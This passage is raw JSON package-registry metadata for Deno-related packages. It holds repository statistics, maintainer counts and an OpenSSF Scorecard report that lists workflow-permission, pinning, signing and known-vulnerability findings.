T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T10:14:52.651Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.696275283753454,"dependent_packages_count":42.45229214719405,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.074283715473754},"purl":"pkg:maven/org.mvnpm.at.deno/win32-x64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:win32-x64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:win32-x64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:win32-x64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620154,"maintainers_count":0,"namespaces_count":82381,"keywords_count":36851,"github":"maven-central","metadata":{"funded_packages_count":48065,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-01T05:04:44.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":5151451,"name":"deno_node","ecosystem":"cargo","description":"Node compatibility for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":198,"first_release_published_at":"2022-08-11T18:54:14.561Z","latest_release_published_at":"2026-08-27T15:21:34.257Z","latest_release_number":"0.196.0","last_synced_at":"2026-09-01T09:18:03.566Z","created_at":"2022-08-11T19:03:03.772Z","updated_at":"2026-09-01T09:18:03.567Z","registry_url":"https://crates.io/crates/deno_node/","install_command":"cargo install deno_node","documentation_url":"https://docs.rs/deno_node/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed 